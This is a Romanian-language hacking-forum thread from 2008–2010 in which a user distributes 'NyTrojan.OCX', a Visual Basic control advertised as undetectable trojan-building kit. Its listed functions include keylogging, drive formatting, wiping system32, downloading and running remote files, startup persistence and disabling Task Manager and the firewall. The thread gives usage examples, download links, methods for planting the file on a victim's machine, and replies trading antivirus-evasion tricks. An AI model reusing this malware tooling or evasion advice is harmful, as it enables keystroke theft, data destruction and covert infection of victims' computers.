Nytro Posted June 16, 2008 Report Posted June 16, 2008 ::::: NyTrojan OCX ::::::::::::: © Nytro 2008 ::::::: ::: http://rstcenter.com ::: Aceeasi prostie , 100% nedetectabila , lipsa de ocupatie .File : NyTrojan.OCX Size : 76.0 KB Download : http://rapidshare.com/files/122825689/NyTrOjan.ocxhttp://www.speedyshare.com/396218378.htmlFunctii : 1) OpenCDRom 2) CloseCDRom 3) ShowTaskBar 4) HideTaskBar 5) HideMouse 6) ShowMouse 7) LockExe 8) UnLockExe 9) HideClock 10) ShowClock 11) HideStart 12) ShowStart 13) HideIcons 14) ShowIcons 15) DisableTaskManager 16) EnableTaskManager 17) EmptyFolder 18) DesktopFolderFlood 19) DesktopFolderDelete 20) DisableSystemRestore 21) EnableSystemRestore 22) KillProcess 23) AutoDownload 24) SetStartButtonCaption 25) AddToStartUp 26) FreezeMouse 27) StopFreezeMouse 28) CrazyMouse 29) StopCrazyMouse 30) BeepFlood 31) StopBeepFlood 32) Abort 33) LogOff 34) ShutDown 35) Restart 36) Author 37) OpenWebSite 38) FormatDrive 39) SwapMouseButtons 40) StopSwapMouseButtons 41) BypassWindowsFirewall 42) TurnOffMonitor 43) TurnOnMonitor 44) StartKeylogging 45) StopKeylogging 46) Keylog De ce sa il foloiti ? Deoarece simplifica foarte mult munca ta Inca nu am facut un trojan cu el , revin cu el , o sa il fac Folosind aceste functii trojanul e 100% UD Am incercat pe mine si au mers functiile , sa le incercati si voi si daca nu merge o functie sa imi ziceti . Aveti grija la numarul de parameri al functiilor , revin cu un edit in care spun ce face fiecare functie si cum se foloseste . L-am si scanat : File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 0/33 (0%)http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82dAtentie : Daca folositi acest OCX e necesar fisierul pe calculatorul victimei . Cum se poate face asta ? Cel mai simplu , o arhiva SFX , facuta cu WinRAR . OCX-ul trebuie sa se afle in system32 . Cum il folositi in Visual Basic ? Trebuie inregistrat : Run >> regsvr32.exe C:\...\NyTrojan.OCX Sau Apasati CTRL + T in Visual Basic / Components , si dati Browse . Daca aveti probleme , sugestii etc , postati mai jos Functiile OCX-ului : 1. DesktopFolderFlood = Creaza 1000 de foldere pe desktop 2. DesktopFolderDelete = Sterge folderele 3. EmptyFolder = Sterge toate fisierele dintr-un folder Ex. NyTrojan1.EmptyFolder "C:\WINDOWS\system32" 4. KillProcess = Inchide un proces Ex. NyTrojan1.KillProcess "winamp.exe" 5. AutoDownload = Descarca un fisier Ex. NyTrojan1.AutoDownload "http://site.com/server.exe", "C:\x.exe", 1 Parametri : 1. Direct link , 2. Locatia , 3. Ruleaza dupa ? 1 - Ca sa ruleze dupa download 0 - Ca sa nu ruleze dupa download 6. SetStartButtonCaption = Seteaza numele butonului de start Ex. NyTrojan1.SetStartButtonCaption "xxx" 7. AddToStartUp = Adauga la start-up un program Ex. NyTrojan1.AddToStartUp "C:\x.exe" 8. BeepFlood = Beep-uri incontinuu Ex. NyTrojan1.BeepFlood "100" Parametrul reprezinta intervalul beep-urilor 9. OpenWebSite = Deschide WebSite cu IE Ex. NyTrojan1.OpenWebSite "http://www.google.ro" 10. Author = Un MsgBox 11. FormatDrive = Formateaza o partitie Ex. NyTrojan1.FormatDrive "a" Info : Am incercat decat pe A:\ nu si pe C:\ sau D:\ 12. StartKeylogging = Porneste Keylogging-ul 13. StopKeylogging = Opreste Keylogging-ul 14. Keylog = Returneaza Keylog-ul , tastele apasate dupa folosirea functiei StartKeylogging 1 Quote
andr3y Posted June 17, 2008 Report Posted June 17, 2008 cred ca ar trebui sa spui si cum se foloseste ca unii habar n`au Quote
Nytro Posted June 17, 2008 Author Report Posted June 17, 2008 Mersi DLD .andr3y : Se foloseste ca orice OCX . Intri in VB , apesi CTRL + T , dai Browse , il pui pe Form si il folosesti in cod ca in exemplu . Quote
Nytro Posted June 28, 2008 Author Report Posted June 28, 2008 Scuze pentru dublu post , nu mai era deloc FUD , acum e din nou File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 0/33 (0%)http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82dDownload :http://rapidshare.com/files/125661266/NyTrOjan.ocx 1 Quote
Dark Hacker 3k Posted June 28, 2008 Report Posted June 28, 2008 Si nu era mai simplu sa incluzi ocx-ul in executabil, iar la pornire, inainte sa incarce programul sa verifice existenta acestuia, iar daca nu-l gaseste sa il creeze ? Eu asa fac la toate programele create de mine ... includ resursele in executabil. Ia-l ca pe un sfat pentru a-ti perfectiona metodele Quote
Nytro Posted June 29, 2008 Author Report Posted June 29, 2008 Try this : http://rapidshare.com/files/123498228/NyTrojan_RAT.rarScreenshot : http://img229.imageshack.us/img229/7069/screenshotrx0.jpg Quote
Dark Hacker 3k Posted June 29, 2008 Report Posted June 29, 2008 Frumos, exact la asta ma refeream Apropo, ocx-ul si res-urile le vede ca virusi ... din pacate ... Incearca cu module si codul sursa direct in executabil, in modul asta mai pacalesti programele antivirus, cel putin deocamdata .. PS: Trimite-mi te rog un mesaj privat cu id-ul tau de messenger ca sa vorbim mai usor despre anumite lucruri Quote
Nytro Posted June 29, 2008 Author Report Posted June 29, 2008 Nu prea inteleg antivirusii . Am facut niste teste cu Digital Keylogger . Asa cu l-am facut prima oara il detectau 4 antivirusi . Scot din cod autocopierea ocx-ului si il gasesc 5 parca . Apoi sterg tot codul din form si la decat declaratile si un modul care scrie in registry cu RegOpenKey ... Si il gasesc 7 antivirusi . Am sters bucati din cod si tot era detectabil . Am incercat fara autocopiere si bitdefender tot il gasea ca dropper . Nu prea inteleg cum sta treaba . Quote
Dark Hacker 3k Posted June 29, 2008 Report Posted June 29, 2008 La mine cel putin, la trojan acum l-am scanat cu virustotal (si apropo de asta, nu inseamna ca pe viitor il vor detecta antivirusii, fapt probat de mine). Are 31-32 antivirusi in lista si .. din ei doar 3 il vad acum ca fisier suspicios (nod32, sophos si panda), dar nici unul ca virus sigur. Daca scot codul pt auto start-up, il vede numai panda, tot ca suspicious file. Ma rog .. asta era inainte, de atunci l-am actualizat si acum nu l-am mai verificat, dar am fixat niste bug-uri si am adaugat codul pt o singura instanta (proces), etc. Oricum, asta nu are cu ce sa afecteze codul. La tine am impresia ca toata problema se invarte in jurul ocx-ului. incearca sa incluzi comenzile in program, sa nu te folosesti de nytro ocx Edit: Am verificat acum si vad ca a sarit si BitDefender in cele din urma ... Ca o rezolvare,ar fi sa schimbam in primul rand codul pt intrare-registrii. Oricum, 4 din 33 (mai nou), e ceva, pt inceput. Quote
Nytro Posted June 30, 2008 Author Report Posted June 30, 2008 Nu am folosit deloc ocx , dar o sa fac un ocx special si va fi FUD . In ocx trebuie sa scriu in registry cu RegOpenKey si totul e OK Quote
Dark Hacker 3k Posted June 30, 2008 Report Posted June 30, 2008 Yup, si ti-as mai propune ceva: am vazut ca lucrezi in vb6. Dupa ce termini logger-ul, daca tot mai sare cate un antivirus, compileaza proiectul in vb8, (foloseste alt compilator) si ... cam atat. Eu asa am scapat de toti ceilalti, la o proba, insa ai si alte dezavantaje Quote
ActionBoy Posted August 22, 2008 Report Posted August 22, 2008 ma bag ca musca'n ciorba ...un reupload pls? Quote
Nytro Posted August 23, 2008 Author Report Posted August 23, 2008 Rebuilt :File NyTrOjan.ocx received on 08.23.2008 10:40:45 (CET)Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPEDResult: 1/36 (2.78%)http://rapidshare.com/files/139446616/NyTrOjan.ocx Quote
Nytro Posted November 21, 2008 Author Report Posted November 21, 2008 Daca citeai postul de mai sus ... Download : http://rapidshare.com/files/139446616/NyTrOjan.ocxRezultat: 12/36 (33.34%) : http://www.virustotal.com/ro/analisis/2bb0d0936ca08203c5aaf78b5642c6c3 Quote
_nobodY_ Posted February 13, 2009 Report Posted February 13, 2009 nytro ii naspa ca trebuie sa ii dai si la victima nytrojan.ocx daca vrei dami codu de open and close monitor Quote
Nytro Posted February 13, 2009 Author Report Posted February 13, 2009 Nu trebuie sa ii dai, il pui intr-un fisier de resursa in server. Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As LongPrivate Const WM_SYSCOMMAND = &H112&Private Const SC_MONITORPOWER = &HF170&Public Function TurnOffMonitor()SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 1&End FunctionPublic Function TurnOnMonitor()SendMessage UserControl.hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, 0&End Function Quote
Nytro Posted March 18, 2009 Author Report Posted March 18, 2009 Vezi tutorialul meu, apar acolo toate codurile si mai sunt si putin explicate. Quote
ZoOmLeSs Posted July 21, 2009 Report Posted July 21, 2009 Nytro imi poti da un link de download de lal Visual Basicul tau? Quote
Nytro Posted September 8, 2010 Author Report Posted September 8, 2010 E vechi de 2 ani, nici nu cred ca il mai am (nu l-am gasit). Oricum e inutil, nu ai ce face cu el. Quote
dark87 Posted September 9, 2010 Report Posted September 9, 2010 Virustotal.com il strica numa e fud , foloseste novirusthanks2 Quote